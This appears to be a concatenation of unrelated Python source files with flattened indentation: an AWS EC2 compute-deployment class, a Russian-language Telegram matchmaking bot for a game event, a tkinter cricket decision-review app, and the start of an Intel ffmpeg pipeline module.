with default_signals(signal.SIGINT, signal.SIGTERM):
super(SignalHandlingMultiprocessingProcess, self).start()
@contextlib.contextmanager
def default_signals(*signals):
old_signals = {}
for signum in signals:
try:
signal.signal(signum, signal.SIG_DFL)
old_signals[signum] = signal.getsignal(signum)
except ValueError as exc:
# This happens when a netapi module attempts to run a function
# using wheel_async, because the process trying to register signals
# will not be the main PID.
log.trace(
'Failed to register signal for signum %d: %s',
signum, exc
)
# Do whatever is needed with the reset signals
yield
# Restore signals
for signum in old_signals:
signal.signal(signum, old_signals[signum])
del old_signals
|
project.py
|
import os
import time
import logging
import threading
import numpy as np
import pandas as pd
from datetime import datetime
from typing import Optional, List, Dict
from doppel.aws.ec2 import Ec2Client, Ec2
from doppel.aws.s3 import S3Bucket, S3Client
from doppel.aws.iam import IamClient, Policy
from doppel.ssh import SshSession
from doppel.utils import zip_dir, get_module_path
from doppel.core.context import DoppelContext
logging.getLogger('botocore.credentials').setLevel(logging.WARNING)
logging.getLogger('retry.api').setLevel(logging.ERROR)
logging.getLogger('paramiko.transport').setLevel(logging.WARNING)
logger = logging.getLogger('doppel')
KEY = 'doppel'
MAX_INSTANCES = 100
class DoppelPackage:
def __init__(self, path):
self.path = path
self.exists = os.path.exists(path)
self.name = os.path.split(path)[1]
self.is_dir = os.path.isdir(path)
self.has_setup = self.is_dir and os.path.exists(os.path.join(path, 'setup.py'))
self.add_to_pythonpath = self.is_dir and not self.has_setup
def validate(self):
if not self.exists:
raise ValueError('Package path {} does not exists.'.format(self.path))
elif not self.is_dir:
raise ValueError('Package path {} should be a directory.'.format(self.path))
elif self.has_setup:
logger.info('Package {} will be pip installed using setup.py'.format(self.name))
else:
logger.info('Package {} will be added to python path'.format(self.name))
class DoppelProject:
"""
Object allowing to create and manage a computation project deployed on AWS EC2 instances.
Once initialized, the project creates a dedicated bucket on AWS S3.
Parameters
----------
name : string
The project name, used to name the S3 bucket.
src : string, default=None
Python code snippet to directly execute on EC2 instances. Cannot be used with path.
path : string, default=None
Path to a python file or a project directory, to run on EC2 instances. Cannot be used with src.
entry_point : string, default=None
Python entry point to execute when path is passed as a directory. If path points to a python project with a
setup.py, the entry point should be of the form -m module.module, instead of module/module.py
requirements : list of string, default=None
List of dependencies to install on EC2 instances prior to running the code. Should not be passed when
path is a project with a setup.py (and a requirements.txt).
packages : list of string, default=None
List of packages local path to upload and install on EC2 instances prior to running the code.
env_vars : List of string, default=None
List of environment variables to set on EC2 instances.
python : string, default=None
Python version to use when creating virtual environment on EC2 instances. When None, the latest version is used.
n_instances : integer, default=None
Number of instances to start on AWS. When None, calculated using duration and budget if possible, else default
to 1.
duration : float, default=None
Duration (in hours) during which instances should run. When None, calculated using n_instances and budget if
possible, else run indefinitly.
budget : float, default=None
Budget (in your AWS profile currency) allocated to the project. When None, calculated using n_instances and
duration if possible, else no budget limit is defined.
min_memory : float, default=None
Minimum RAM memory, in Gb, for the EC2 instances to have. If not defined, no lower limit is applied.
min_cpu : integer, default=None
Minimum number of vCPUs for the EC2 instances to have. If not defined, no lower limit is applied.
min_gpu : integer, default=None
Minimum number of GPUs for the EC2 instance to have. If not defined, no lower limit is applied.
context : DoppelContext, default=None
When starting new instances, the project will copy data defined on the context to each instance. Those data
can then be accessed using context.data_path(<key>), which will return the local path when the code is running
locally, or the remote path when the code is running on AWS.
key_path : string, default=None
Path to an AWS key pair pem file to use instead of creating a new key pair. The file should be of the form
<key_pair.pem>, where <key_pair> is the name of the key pair already existing on AWS.
Examples
--------
>>> context = DoppelContext() \
>>> .add_data(key='train', bucket='my-project-data', source=r'C:\data\project\train.csv') \
>>> .add_data(key='test', bucket='my-project-data', source=r'C:\data\project\test.csv')
>>> context.upload_data()
>>>
>>> project = DoppelProject(
>>> name='project-run-1',
>>> path=r'C:\app\project',
>>> entry_point='-m project.run',
>>> n_instances=10, budget=20,
>>> min_memory=16, min_cpu=8,
>>> context=context
>>> )
>>> project.start()
>>> project.monitore()
"""
def __init__(
self,
name: str,
src: Optional[str] = None,
path: Optional[str] = None,
entry_point: Optional[str] = None,
requirements: Optional[List[str]] = None,
packages: Optional[List[str]] = None,
env_vars: Optional[Dict[str, str]] = None,
python: Optional[str] = None,
n_instances: Optional[int] = None,
duration: Optional[float] = None,
budget: Optional[float] = None,
min_memory: Optional[float] = None,
min_cpu: Optional[int] = None,
min_gpu: Optional[int] = None,
context: Optional[DoppelContext] = None,
key_path: Optional[str] = None,
commands: Optional[List[str]] = None
):
self.name = self._format_name(name)
self.arn = self._get_arn(name)
self.src = src
self.path = path
self.entry_point = entry_point
self.packages = packages
self.requirements = requirements
self.env_vars = env_vars
self.python = python
self.n_instances = n_instances
self.duration = duration
self.budget = budget
self.min_memory = min_memory
self.min_cpu = min_cpu
self.min_gpu = min_gpu
self.context = context
self.key_path = key_path
self.commands = commands
self.file_path = path if path is not None and os.path.isfile(path) else None
self.dir_path = path if path is not None and os.path.isdir(path) else None
self.package = None
if self.dir_path is not None:
self.package = DoppelPackage(path)
self.doppel_packages = None
if self.packages is not None:
self.doppel_packages = [DoppelPackage(path) for path in self.packages]
# Project details
self.image_id = None
self.platform_details = None
self.instance_type = None
self.instance_availability_zone = None
self.instance_vcpu = None
self.instance_memory = None
self.instance_price = None
# Key pair
if self.key_path is None:
self.key_name = 'key-pair-{}'.format(self.arn)
else:
self.key_name = os.path.basename(self.key_path)[:-4]
self.key_id = None
self.key_material = None
# Security group
self.group_name = 'group-{}'.format(self.arn)
self.group_id = None
# IAM role and instance profile
self.role_name = 'role-{}'.format(self.arn)
self.role_id = None
self.role_arn = None
self.instance_profile_name = 'profile-{}'.format(self.arn)
self.instance_profile_arn = None
# Boto clients
self.ec2: Ec2Client = None
self.bucket: S3Bucket = None
self.iam: IamClient = None
self.initialized = False
self.start_time = None
self.terminated = False
self._init_aws_clients()
@staticmethod
def _format_name(name):
name = ''.join([c if c.isalnum() else '-' for c in name.lower()])
name = name.strip('-')
return name
@staticmethod
def _get_arn(name):
return '{}-{}'.format(KEY, name)
def _validate(self):
if self.src is None and self.path is None:
raise ValueError('You need to provide either src or path.')
elif self.src is not None and self.path is not None:
raise ValueError('You can either provide one of src and path.')
elif self.src is not None and self.entry_point is not None:
raise ValueError('entry_point not accepted when providing src.')
elif self.path is not None and not os.path.exists(self.path):
raise FileNotFoundError('path does not exists.')
elif self.file_path is not None and self.entry_point is not None:
raise ValueError('entry_point not accepted when providing a file path.')
elif self.dir_path is not None and self.entry_point is None:
raise ValueError('entry_point needed when providing a directory path.')
# Validate package
if self.package is not None:
self.package.validate()
if self.package.has_setup and self.requirements is not None:
raise ValueError('You should not provide requirements when your path has a setup.py')
# Validate packages
if self.packages is not None:
for package in self.doppel_packages:
package.validate()
def save(self):
config = dict(
name=self.name,
src=self.src,
path=self.path,
entry_point=self.entry_point,
packages=self.packages,
requirements=self.requirements,
env_vars=self.env_vars,
python=self.python,
n_instances=self.n_instances,
key_path=self.key_path,
duration=self.duration,
budget=self.budget,
min_memory=self.min_memory,
min_cpu=self.min_cpu,
min_gpu=self.min_gpu,
context=self.context.data if self.context is not None else None
)
status = dict(
name=self.name,
status=self.get_status(),
start_time=self.start_time
)
self.bucket.save(config, 'doppel.config')
self.bucket.save(status, 'doppel.status')
if self.key_material is not None:
self.bucket.save(self.key_material, 'key.pem')
def get_status(self):
status = 'initialized'
if self.terminated:
status = 'terminated'
elif self.start_time is not None:
status = 'running'
return status
@classmethod
def exists(cls, name):
name = cls._format_name(name)
arn = cls._get_arn(name)
return S3Client().bucket_exists(arn)
@classmethod
def load(cls, name):
name = cls._format_name(name)
arn = cls._get_arn(name)
if not S3Client().bucket_exists(arn):
raise ValueError('Project {} does not exists.'.format(name))
bucket = S3Bucket(arn)
config = bucket.load_json('doppel.config')
config['context'] = DoppelContext(config['context'])
project = cls(**config)
status = bucket.load_json('doppel.status')
if status['start_time'] is not None:
project.start_time = datetime.fromisoformat(status['start_time'])
project.terminated = (status['status'] == 'termminated')
if bucket.exists('key.pem'):
project.key_material = bucket.load('key.pem')
return project
def _init_aws_clients(self):
self.ec2 = Ec2Client()
self.bucket = S3Bucket(self.arn)
self.bucket.block_public_access()
self.iam = IamClient()
def init(self):
self._init_image()
self._init_instance()
self._init_project()
self.initialized = True
def _init_image(self):
image = self.ec2.get_latest_deep_learning_image()
self.image_id = image[Ec2.IMAGE_ID]
self.platform_details = image[Ec2.PLATFORM_DETAILS]
def _init_instance(self):
instances = self.ec2.get_instance_types()
instances = instances[instances[Ec2.SUPPORTED_USAGES].apply(lambda x: 'spot' in x)]
instances[Ec2.MEMORY_INFO] = np.round(instances[Ec2.MEMORY_INFO] / 1024)
if self.min_memory is not None:
instances = instances[instances[Ec2.MEMORY_INFO] >= self.min_memory]
if self.min_cpu is not None:
instances = instances[instances[Ec2.VCPU_INFO] >= self.min_cpu]
if self.min_gpu is not None:
def valid_gpu_instance(gpu):
if pd.isnull(gpu):
return False
return gpu[0]['Count'] >= self.min_gpu
instances = instances[instances[Ec2.GPU_INFO].apply(valid_gpu_instance)]
prices = self.ec2.get_spot_prices(products_description=self.platform_details)
instances = pd.merge(instances, prices, on=Ec2.INSTANCE_TYPE)
instances = instances.sort_values(Ec2.SPOT_PRICE)
if len(instances) == 0:
raise ValueError('No instance matches minimum requirements')
instance = instances.iloc[[0]].to_dict(orient='records')[0]
self.instance_type = instance[Ec2.INSTANCE_TYPE]
self.instance_availability_zone = instance[Ec2.AVAILABILITY_ZONE]
self.instance_vcpu = instance[Ec2.VCPU_INFO]
self.instance_memory = instance[Ec2.MEMORY_INFO]
self.instance_price = instance[Ec2.SPOT_PRICE]
logger.info('Selecting {} instance in {} [{:.0f} CPUs, {:.1f}Go, {:.4f}€/h]'.format(
self.instance_type,
self.instance_availability_zone,
self.instance_vcpu,
self.instance_memory,
self.instance_price))
def _init_project(self):
n_none = (self.n_instances is None) + (self.duration is None) + (self.budget is None)
if n_none == 1:
if self.n_instances is None:
self._compute_n_instances()
elif self.duration is None:
self._compute_duration()
elif self.budget is None:
self._compute_budget()
elif n_none == 2:
if self.n_instances is not None:
pass
elif self.duration is not None:
self.n_instances = 1
self._compute_budget()
elif self.budget is not None:
self.n_instances = 1
self._compute_duration()
elif n_none == 3:
self.n_instances = 1
if self.n_instances > MAX_INSTANCES:
raise ValueError('Reached maximum of {} instances. Increase duration or reduce budget.')
if self.duration is None:
logger.info('Running {} instances indefinitly, for {}€/hour'.format(
self.n_instances, self.n_instances * self.instance_price))
else:
logger.info('Running {} instances for {:.1f} hours, for {:.2f}€'.format(
self.n_instances, self.duration, self.budget))
def _compute_n_instances(self):
self.n_instances = (int)(np.round(self.budget / (self.duration * self.instance_price), 0))
self._compute_duration()
def _compute_duration(self):
self.duration = self.budget / (self.n_instances * self.instance_price)
def _compute_budget(self):
self.budget = self.n_instances * self.duration * self.instance_price
def start(self):
if not self.initialized:
self.init()
self._validate()
# We save the project first thing to be able to easily destroy it if something goes wrong before the next save
self.save()
self.terminated = False
self.start_time = datetime.now()
self._create_aws_resources()
self._push_code_to_s3()
self.save()
instance_dns = self._start_instances(self.n_instances)
self._configure_instances(instance_dns)
def _create_aws_resources(self):
if self.key_path is None:
self._create_key_pair()
else:
self._load_key_pair()
self._create_security_group()
self._create_role()
self._create_instance_profile()
def _load_key_pair(self):
with open(self.key_path) as stream:
self.key_material = stream.read()
def _create_key_pair(self):
key = self.ec2.create_key_pair(self.key_name, tag=(KEY, self.name))
self.key_id = key['KeyPairId']
self.key_material = key['KeyMaterial']
def _create_security_group(self):
group = self.ec2.create_security_group(
self.group_name, 'Security for {} {}'.format(KEY, self.name),
tag=(KEY, self.name)
)
self.group_id = group['GroupId']
self.ec2.add_ssh_access_to_my_ip_to_security_group(self.group_id)
def _create_role(self):
role = self.iam.create_role(self.role_name, service='ec2',
description='Role for {} {}'.format(KEY, self.name),
tag=(KEY, self.name))
self.role_id = role['RoleId']
self.role_arn = role['Arn']
self.iam.attach_role_policy(self.role_name, Policy.EC2)
self.iam.attach_role_policy(self.role_name, Policy.S3)
self.iam.attach_role_policy(self.role_name, Policy.IAM)
self.iam.attach_role_policy(self.role_name, Policy.CLOUD_WATCH)
def _create_instance_profile(self):
profile = self.iam.create_instance_profile(self.instance_profile_name, self.role_name)
self.instance_profile_arn = profile['Arn']
def _push_code_to_s3(self):
if self.src is not None:
self.bucket.save(self.src, 'main.py')
elif self.file_path is not None:
self.bucket.upload(self.file_path, 'main.py')
elif self.dir_path is not None:
zip = zip_dir(self.dir_path)
self.bucket.save(zip, 'src.zip')
if self.packages is not None:
for package in self.doppel_packages:
zip = zip_dir(package.path)
self.bucket.save(zip, '{}.zip'.format(package.name))
if self.requirements is not None:
self.bucket.save('\n'.join(self.requirements), 'requirements.txt')
with open(os.path.join(get_module_path(), 'aws/awslogs/awscli.conf')) as file:
aws_cli = file.read()
aws_cli = aws_cli.format(region=self.ec2.region)
with open(os.path.join(get_module_path(), 'aws/awslogs/awslogs.conf')) as file:
aws_logs = file.read()
log_group = '{}-{}'.format(KEY, self.name)
log_group_name = log_group
aws_logs = aws_logs.format(log_group=log_group, log_group_name=log_group_name)
self.bucket.save(aws_cli, 'awscli.conf')
self.bucket.save(aws_logs, 'awslogs.conf')
@staticmethod
def get_package_name(path, i):
name = os.path.split(path)[1]
if name == '':
name = 'package'
name = '{}-{}'.format(name, i)
return name
def _start_instances(self, n):
instances = self.ec2.run_spot_instances(
ami_id=self.image_id, instance_type=self.instance_type, availability_zone=self.instance_availability_zone,
key_name=self.key_name, group_name=self.group_name, instance_profile_arn=self.instance_profile_arn,
n_instances=n, tag=(KEY, self.name)
)
instance_dns = [instance[Ec2.PUBLIC_DNS] for instance in instances]
return instance_dns
def _configure_instances(self, instance_dns):
if len(instance_dns) == 1:
self._configure_instance(instance_dns[0])
else:
threads = [threading.Thread(target=self._configure_instance, args=(dns,)) for dns in instance_dns]
[thread.start() for thread in threads]
[thread.join() for thread in threads]
def _configure_instance(self, dns):
logger.info('Configuring instance {}'.format(dns))
ssh = SshSession(dns, Ec2.USER, key=self.key_material)
ssh.connect()
# Init
ssh.mkdir(KEY)
with ssh.cd(KEY):
ssh.mkdir('data')
ssh.mkdir('src')
ssh.run("echo \"Instance started\" > logs")
# Update
# ssh.run('sudo yum -y update')
# Configure logging
# ssh.run('sudo yum install -y awslogs')
with ssh.cd('/etc/awslogs'):
ssh.run('sudo aws s3 cp s3://{}/awscli.conf .'.format(self.arn))
ssh.run('sudo aws s3 cp s3://{}/awslogs.conf .'.format(self.arn))
ssh.run('sudo systemctl start awslogsd')
# Downloading data
if self.context is not None:
for key, data in self.context.data.items():
self._log(ssh, f'Downloading {key}')
with ssh.cd(KEY, 'data'):
ssh.run('aws s3 cp s3://{}/{} .'.format(data['bucket'], key))
# Create virtual env
self._log(ssh, 'Creating virtual env')
python = '' if self.python is None else '={}'.format(self.python)
ssh.run('yes | conda create -n {} python{}'.format(KEY, python))
# Installing packages
if self.packages is not None:
for package in self.doppel_packages:
self._log(ssh, f'Installing package {package.name}')
with ssh.cd(KEY):
ssh.run('aws s3 cp s3://{}/{name}.zip {name}.zip'.format(self.arn, name=package.name))
ssh.run('unzip {name}.zip -d {name}'.format(name=package.name))
if package.has_setup:
with ssh.activate(KEY), ssh.cd(KEY, package.name):
ssh.run('pip install .')
# Retrieve source
self._log(ssh, 'Installing source')
with ssh.cd(KEY):
if self.src is not None or self.file_path is not None:
ssh.run('aws s3 cp s3://{}/main.py src/main.py'.format(self.arn))
elif self.package is not None:
ssh.run('aws s3 cp s3://{}/src.zip src.zip'.format(self.arn))
ssh.run('unzip src.zip -d src')
# Install requirements
with ssh.cd(KEY, 'src'), ssh.activate(KEY):
if self.requirements is not None:
ssh.run('aws s3 cp s3://{}/requirements.txt .'.format(self.arn))
ssh.run('pip install -r requirements.txt')
elif self.package is not None and self.package.has_setup:
ssh.run('pip install .')
# Run user commands
if self.commands is not None:
for command in self.commands:
ssh.run(command)
# Run
self._log(ssh, 'Starting')
with ssh.activate(KEY), ssh.connection.prefix(self._export_env_vars()), ssh.cd(KEY, 'src'):
ssh.python(self.entry_point or 'main.py', disown=True)
def _log(self, ssh, message):
with ssh.cd(KEY):
ssh.run(f"echo \"{message}\" >> logs")
def _export_env_vars(self):
if self.env_vars is None:
env_vars = {}
else:
env_vars = self.env_vars.copy()
env_vars['DOPPEL'] = 'true'
env_vars['DOPPEL_NAME'] = self.name
env_vars['DOPPEL_ARN'] = self.arn
env_vars['DOPPEL_REGION'] = self.ec2.region
pythonpath = self._get_pythonpath()
if len(pythonpath) > 0:
env_vars['PYTHONPATH'] = ':'.join(pythonpath)
return ' && '.join(['export {}={}'.format(k, v) for k, v in env_vars.items()])
def _get_pythonpath(self):
pythonpath = []
self._add_to_pythonpath(self.package, pythonpath, is_src=True)
if self.packages is not None:
[self._add_to_pythonpath(package, pythonpath, is_src=False) for package in self.doppel_packages]
return pythonpath
@staticmethod
def _add_to_pythonpath(package, pythonpath, is_src=True):
if package is None:
return
if package.add_to_pythonpath:
package_path = '/home/ec2-user/doppel/'
if is_src:
package_path += 'src'
else:
package_path += package.name
pythonpath.append(package_path)
def status(self):
instances = self.ec2.get_instances_by_tag(KEY, self.name)
print('-------- {}: {} instances'.format(self.name, len(instances)))
for instance in instances:
launch = instance['LaunchTime']
runtime = datetime.now(launch.tzinfo) - launch
print('[{}] {}, launched {:.1f} hours ago'.format(instance['InstanceId'], instance['State']['Name'], runtime.total_seconds()/3600))
def monitore(self):
if not self.initialized:
self.init()
while True:
if self.duration is not None and self._get_duration() > self.duration:
logger.info('Terminating project...')
self.terminate()
break
states = self.ec2.get_instances_by_tag(KEY, self.name, attribute=['State', 'Name'])
n_running = len([state for state in states if state == 'running'])
logger.info('{} instances running'.format(n_running))
missing_instances = self.n_instances - n_running
if missing_instances > 0:
logger.info('Starting {} new instances'.format(missing_instances))
instance_dns = self._start_instances(missing_instances)
self._configure_instances(instance_dns)
time.sleep(300)
def _get_duration(self):
if self.start_time is None:
raise ValueError('project not started')
return (datetime.now() - self.start_time).total_seconds() / 3600
def terminate(self):
instance_ids = self.ec2.get_instances_by_tag(KEY, self.name, 'InstanceId')
if len(instance_ids) > 0:
self.ec2.terminate_instances(instance_ids)
self.ec2.delete_key_pair_by_tag(KEY, self.name)
self.ec2.delete_security_group_by_tag(KEY, self.name)
self.iam.delete_instance_profile(self.instance_profile_name)
self.iam.delete_role(self.role_name)
self.terminated = True
self.save()
def destroy(self):
self.terminate()
self.bucket.empty()
self.bucket.delete()
|
bot.py
|
from telegram.ext import CommandHandler, MessageHandler, CallbackQueryHandler, Filters
from work_materials.globals import updater, dispatcher, castles as castles_const, classes_list as classes_const,\
conn, cursor, admin_ids
import work_materials.globals as globals
from libs.start_pult import rebuild_pult
from bin.save_load_user_data import loadData, saveData
from bin.pult_callback import pult_callback
from bin.shipper import shipper, shipper_selected_castle, shipper_selected_class, shipper_force, shadow_letter, \
shadow_letter_confirm, shadow_letter_send, shadow_letter_cancel, fill_shippers, shipper_mute, shipper_unmute, \
reply_to_message, reply_confirm, reply_cancel, reply_send, fill_sent_messages
from bin.profile import profile, shipper_history, shipper_history_short
from bin.message_mass_send import mass_send_start
from work_materials.filters.service_filters import filter_is_admin, filter_only_registration, filter_delete_yourself
from work_materials.filters.shipper_filters import filter_shipper_castle, filter_shipper_class, filter_mute_shipper, filter_unmute_shipper
from work_materials.filters.shadow_letter_filters import filter_shadow_letter, filter_awaiting_shadow_letter, \
filter_confirm_shadow_letter, filter_cancel_shadow_letter, filter_reply_to_message, filter_awaiting_reply, \
filter_confirm_reply, filter_cancel_reply
import logging, threading
# Выставляем логгироввание
console = logging.StreamHandler()
console.setLevel(logging.INFO)
log_file = logging.FileHandler(filename='error.log', mode='a')
log_file.setLevel(logging.ERROR)
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level = logging.INFO, handlers=[log_file, console])
def start(bot, update, user_data):
mes = update.message
if user_data.get('class') is not None:
bot.send_message(chat_id = mes.chat_id,
text = "Вы уже зарегистрированы!\nИспользуйте /shipper, чтобы найти пару, "
"или /profile, чтобы посмотреть профиль и историю поиска")
return
pult_status = {'castle' : -1, 'class' : -1}
user_data.update({'castles' : castles_const.copy(), 'classes' : classes_const.copy(), 'start_pult_status' : pult_status})
reply_markup = rebuild_pult("default", None, user_data)
bot.send_message(chat_id = mes.chat_id, text = "Выберите свой замок и класс!", reply_markup = reply_markup)
if update.message.from_user.username is None:
bot.send_message(chat_id = update.message.chat_id,
text = "У вас не установлено имя пользователя, поэтому часть функций бота будет для вас недоступна. Например, вас не смогут находить другие пользователи бота.\n" \
"Вы можете использовать /delete_self до первого поиска (если Вы уже прошли регистрацию), установить имя пользователя Telegram (откройте настройки Telegram -> username) и зарегистрироваться в боте заново (/start) для снятия ограничений.")
def delete_self(bot, update, user_data):
user_data.clear()
request = "delete from players where telegram_id = %s"
cursor.execute(request, (update.message.from_user.id,))
bot.send_message(chat_id = update.message.chat_id, text = "Удаление завершено")
start(bot, update, user_data)
def bot_help(bot, update):
response = "Данный бот предназначен для помощи игрокам чв в нахождении вторых половинок и приурочен к 14 февраля.\nСписок доступных команд:\n"
response += "/start - Регистрация в боте, всё очевидно.\n/shipper - Начать процесс поиска, можно использовать 1 раз в час\n"
response += "/delete_self - Удаление регистрации, можно использовать до первого успешного /shipper\n"
response += "/profile - Отображение основной информации.\n/shipper_history - Отображение истории поиска (последние 10 результатов, для отображения полной - /shipper_history_full)\n"
response += "/disable_shipper - Отключить участие в шиппере\n"
response += "Так же доступны некоторые другие команды, подсказки будут возникать по ходу использования.\n\n"
if update.message.from_user.id in admin_ids:
response += "<b>Admin features:</b>\n"
response += "/delete_self - аналогично, но работает в любое время (использовать с огромной осторожностью, " \
"возможна значительная потеря данных\n/shipper_force - Тот же шиппер, но с игнорированием временных " \
"ограничений, не будет учитываться в статистике и при самом шиппере."
bot.send_message(chat_id = update.message.chat_id, text = response, parse_mode = 'HTML')
def inline_callback(bot, update, user_data):
if update.callback_query.data.find("p") == 0:
pult_callback(bot, update, user_data)
return
def only_registration(bot, update):
bot.send_message(chat_id = update.message.chat_id,
text = "До 14 февраля доступна только регистрация! Наберитесь терпения!\n"
"Вы можете использовать /profile для проверки регистрации")
def unknown_message(bot, update):
bot.send_message(chat_id = update.message.chat_id, text = "Некорректный ввод, попробуйте повторить /shipper")
def disable_shipper(bot, update):
request = "update players set shipper_enabled = FALSE where telegram_id = %s"
cursor.execute(request, (update.message.from_user.id,))
bot.send_message(chat_id = update.message.chat_id,
text = "Вы больше не участвуете в поиске пар :-(\n\n"
"Если передумаете, нажмите /enable_shipper")
def enable_shipper(bot, update):
request = "update players set shipper_enabled = TRUE where telegram_id = %s"
cursor.execute(request, (update.message.from_user.id,))
bot.send_message(chat_id = update.message.chat_id,
text = "Вы снова участвуете в подборе!")
def disable_waiting_time(bot, update):
mes = update.message
player_id = int(mes.text.partition(" ")[2])
user_data = dispatcher.user_data.get(player_id)
if user_data is None:
bot.send_message(chat_id = mes.chat_id, text = "Данных о пользователе не найдено!")
return
last_time_shipper_used = user_data.get("last_shipper_time")
if last_time_shipper_used is None:
bot.send_message(chat_id=mes.chat_id, text="Время последнего использования не найдено!")
return
user_data.pop("last_shipper_time")
bot.send_message(chat_id=mes.chat_id, text="Успешно")
dispatcher.add_handler(CommandHandler('start', start, pass_user_data=True))
dispatcher.add_handler(CommandHandler('help', bot_help))
dispatcher.add_handler(CommandHandler('profile', profile, pass_user_data=True))
dispatcher.add_handler(CommandHandler('shipper_history_full', shipper_history, pass_user_data=True))
dispatcher.add_handler(CommandHandler('shipper_history', shipper_history_short, pass_user_data=True))
dispatcher.add_handler(CommandHandler('disable_shipper', disable_shipper, pass_user_data=False))
dispatcher.add_handler(CommandHandler('enable_shipper', enable_shipper, pass_user_data=False))
#dispatcher.add_handler(CommandHandler('delete_self', delete_self, filters=filter_is_admin, pass_user_data=True)) # Отключил вообще, иначе каскадом уронит шипперы как свои, так и с собой
dispatcher.add_handler(CommandHandler('delete_self', delete_self, filters=filter_delete_yourself, pass_user_data=True))
dispatcher.add_handler(CommandHandler('shipper_force', shipper_force, filters=filter_is_admin, pass_user_data=True))
dispatcher.add_handler(CommandHandler('disable_waiting_time', disable_waiting_time, filters=filter_is_admin, pass_user_data=False))
dispatcher.add_handler(CommandHandler('send_start_all', mass_send_start, filters=filter_is_admin, pass_user_data=False))
dispatcher.add_handler(MessageHandler(filter_only_registration, only_registration)) # TODO: вернуть
dispatcher.add_handler(CommandHandler('shipper', shipper, pass_user_data=True))
dispatcher.add_handler(MessageHandler(Filters.text & filter_shipper_castle, shipper_selected_castle, pass_user_data=True))
dispatcher.add_handler(MessageHandler(Filters.text & filter_shipper_class, shipper_selected_class, pass_user_data=True))
dispatcher.add_handler(MessageHandler(Filters.command & filter_shadow_letter, shadow_letter, pass_user_data=True))
dispatcher.add_handler(MessageHandler(Filters.text & filter_awaiting_shadow_letter, shadow_letter_confirm, pass_user_data=True))
dispatcher.add_handler(MessageHandler(Filters.command & filter_confirm_shadow_letter, shadow_letter_send, pass_user_data=True))
dispatcher.add_handler(MessageHandler(Filters.command & filter_cancel_shadow_letter, shadow_letter_cancel, pass_user_data=True))
dispatcher.add_handler(MessageHandler(Filters.command & filter_mute_shipper, shipper_mute, pass_user_data=True))
dispatcher.add_handler(MessageHandler(Filters.command & filter_unmute_shipper, shipper_unmute, pass_user_data=True))
dispatcher.add_handler(MessageHandler(Filters.command & filter_reply_to_message, reply_to_message, pass_user_data=True))
dispatcher.add_handler(MessageHandler(Filters.text & filter_awaiting_reply, reply_confirm, pass_user_data=True))
dispatcher.add_handler(MessageHandler(Filters.command & filter_confirm_reply, reply_send, pass_user_data=True))
dispatcher.add_handler(MessageHandler(Filters.command & filter_cancel_reply, reply_cancel, pass_user_data=True))
dispatcher.add_handler(MessageHandler(Filters.all, unknown_message))
dispatcher.add_handler(CallbackQueryHandler(inline_callback, pass_update_queue=False, pass_user_data=True))
loadData()
fill_shippers()
fill_sent_messages()
save_user_data = threading.Thread(target=saveData, name="Save User Data")
save_user_data.start()
updater.start_polling(clean=False)
# Останавливаем бота, если были нажаты Ctrl + C
updater.idle()
globals.processing = 0
# Разрываем подключение к бд.
conn.close()
|
main.py
|
import tkinter
import cv2
import PIL.Image, PIL.ImageTk
from functools import partial
import threading
import imutils
import time
stream = cv2.VideoCapture("./video/clip.mp4")
flag = True
def play(speed):
global flag
print(f"You clicked on play. Speed is {speed}")
# Playing the video
frame1 = stream.get(cv2.CAP_PROP_POS_FRAMES)
stream.set(cv2.CAP_PROP_POS_FRAMES, frame1 + speed)
grabbed, frame = stream.read()
if not grabbed:
exit()
frame = imutils.resize(frame, width=SET_WIDTH, height=SET_HEIGHT)
frame = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
canvas.image = frame
canvas.create_image(0, 0, image=frame, anchor=tkinter.NW)
if flag:
canvas.create_text(137, 26, fill="red", font="Times 26 bold", text="Decision Pending")
flag = not flag
def pending(decision):
# 1. Display dicision pending image
frame = cv2.cvtColor(cv2.imread("./images/pending.png"), cv2.COLOR_BGR2RGB)
frame = imutils.resize(frame, width=SET_WIDTH, height=SET_HEIGHT)
frame = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
canvas.image = frame
canvas.create_image(0, 0, image=frame, anchor=tkinter.NW)
# 2. Wait for 2 second
time.sleep(2)
# 3. Display sponsor image
frame = cv2.cvtColor(cv2.imread("./images/sponsor.png"), cv2.COLOR_BGR2RGB)
frame = imutils.resize(frame, width=SET_WIDTH, height=SET_HEIGHT)
frame = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
canvas.image = frame
canvas.create_image(0, 0, image=frame, anchor=tkinter.NW)
# 4. Wait for 1.25 second
time.sleep(1.25)
# 5. Display out/not_out image
if decision == 'out':
decisionImg = "./images/out.png"
else:
decisionImg = "./images/not_out.png"
frame = cv2.cvtColor(cv2.imread(decisionImg), cv2.COLOR_BGR2RGB)
frame = imutils.resize(frame, width=SET_WIDTH, height=SET_HEIGHT)
frame = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
canvas.image = frame
canvas.create_image(0, 0, image=frame, anchor=tkinter.NW)
# 6. Wait for 2 second
def out():
thread = threading.Thread(target=pending, args=("out",))
thread.daemon = 1
thread.start()
print("Player is out")
def not_out():
thread = threading.Thread(target=pending, args=("not out",))
thread.daemon = 1
thread.start()
print("Player is not out")
# Width and Height of main screen
SET_WIDTH = 650
SET_HEIGHT = 365
# Tkinter gui starts here
window = tkinter.Tk()
window.title("Third Umpire Dicision Review Kit")
cv_img = cv2.cvtColor(cv2.imread("./images/welcome.png"), cv2.COLOR_BGR2RGB)
canvas = tkinter.Canvas(window, width=SET_WIDTH, height=SET_HEIGHT)
photo = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(cv_img))
image_on_canvas = canvas.create_image(0, 0, anchor=tkinter.NW, image=photo)
canvas.pack()
# Buttons to control playback
btn = tkinter.Button(window, text="<< Previous (fast)", width=50, command=partial(play, -25))
btn.pack()
btn = tkinter.Button(window, text="<< Previous (slow)", width=50, command=partial(play, -2))
btn.pack()
btn = tkinter.Button(window, text="Next (slow) >>", width=50, command=partial(play, 2))
btn.pack()
btn = tkinter.Button(window, text="Next (fast) >>", width=50, command=partial(play, 25))
btn.pack()
btn = tkinter.Button(window, text="Give Out", width=50, command=out)
btn.pack()
btn = tkinter.Button(window, text="Give Not Out", width=50, command=not_out)
btn.pack()
window.mainloop()
|
ffmpeg_pipeline.py
|
'''
* Copyright (C) 2019-2020 Intel Corporation.
*
* SPDX-License-Identifier: BSD-3-Clause
'''
import string
import shlex
